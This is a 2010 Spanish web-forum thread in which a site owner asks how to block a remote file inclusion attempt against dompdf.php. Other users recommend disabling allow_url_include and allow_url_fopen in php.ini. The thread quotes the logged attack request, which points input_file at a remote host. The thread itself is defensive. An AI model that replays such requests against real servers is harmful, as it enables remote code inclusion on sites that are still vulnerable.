Foros del Web » Administración de Sistemas » Cloud Computing »

ayuda con regla modsecurity

Estas en el tema de ayuda con regla modsecurity en el foro de Cloud Computing en Foros del Web. tengo un dominio al cual le estan haciendo el siguiente ataque: Request GET /dompdf/dompdf.php?input_file=http://secrise.com/lang/test. Desearia saber , cual seria el formato adecuado de la regla ...
  #1 (permalink)  
Antiguo 15/09/2010, 11:28
 
Fecha de Ingreso: diciembre-2006
Mensajes: 439
Antigüedad: 18 años
Puntos: 1
ayuda con regla modsecurity

tengo un dominio al cual le estan haciendo el siguiente ataque:

Request
GET /dompdf/dompdf.php?input_file=http://secrise.com/lang/test.


Desearia saber , cual seria el formato adecuado de la regla modsecurity para bloquear todo tipo de acceso a este web secrise.com?



gracias
  #2 (permalink)  
Antiguo 15/09/2010, 12:41
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 4 meses
Puntos: 68
Respuesta: ayuda con regla modsecurity

Puedes modificar el php.ini y deshabilitar la inclusión de archivos remotos.
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #3 (permalink)  
Antiguo 15/09/2010, 13:15
 
Fecha de Ingreso: diciembre-2006
Mensajes: 439
Antigüedad: 18 años
Puntos: 1
Respuesta: ayuda con regla modsecurity

gracias por tu respuesta.

la pregunta del millon es : que cambios hay que hacer exactamente en el PHP.INI ??
  #4 (permalink)  
Antiguo 15/09/2010, 13:29
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 4 meses
Puntos: 68
Respuesta: ayuda con regla modsecurity

Deshabilita:
Cita:
allow_url_include
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #5 (permalink)  
Antiguo 15/09/2010, 13:33
 
Fecha de Ingreso: diciembre-2006
Mensajes: 439
Antigüedad: 18 años
Puntos: 1
Respuesta: ayuda con regla modsecurity

gracias por tu tiempo y paciencia en responder.

bueno, no encontré la opcion que dices. Pero si encontré la opcion "allow_url_fopen" el cual esta en ON

la opcion allow_url_include es la misma que allow_url_fopen ??
  #6 (permalink)  
Antiguo 15/09/2010, 13:42
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 4 meses
Puntos: 68
Respuesta: ayuda con regla modsecurity

Lo olvidaba depende de la versión de PHP que tengas instalada, pero te sugiero que desactives también "allow_url_fopen"

Lee lo siguiente

http://php.net/manual/es/filesystem.configuration.php
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas
  #7 (permalink)  
Antiguo 15/09/2010, 13:52
 
Fecha de Ingreso: diciembre-2006
Mensajes: 439
Antigüedad: 18 años
Puntos: 1
Respuesta: ayuda con regla modsecurity

En el link que mencionas dice que "allow_url_include" esta desde php 5.2.0 en adelante-

Actualmente uso php 5.2.9 , pero no veo tal opcion
  #8 (permalink)  
Antiguo 15/09/2010, 14:02
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 4 meses
Puntos: 68
Respuesta: ayuda con regla modsecurity

Agrega en el archivo php.ini y reinicia el servicio

Cita:
allow_url_include = Off
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas

Última edición por JoshMex; 16/09/2010 a las 08:36 Razón: Edición solicitada por hyperwin
  #9 (permalink)  
Antiguo 15/09/2010, 14:49
 
Fecha de Ingreso: diciembre-2006
Mensajes: 439
Antigüedad: 18 años
Puntos: 1
Respuesta: ayuda con regla modsecurity

poner ON esa variable?

creí que la opcion adecuada era ponerla OFF , y asi evitar pemitir el acceso

porfa, confirmar el valor de la variable

gracias
  #10 (permalink)  
Antiguo 15/09/2010, 15:26
Avatar de hyperwin  
Fecha de Ingreso: agosto-2010
Mensajes: 1.290
Antigüedad: 14 años, 4 meses
Puntos: 68
Respuesta: ayuda con regla modsecurity

Sorry .... si es en Off
__________________
Administrador de Servidores Windows
www.hyperwin.net
WebSitePanel - Helm Control - HostingController - DotNetPanel
Instalación - Configuración - Hardening - Solución de problemas

Etiquetas: regla
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 21:14.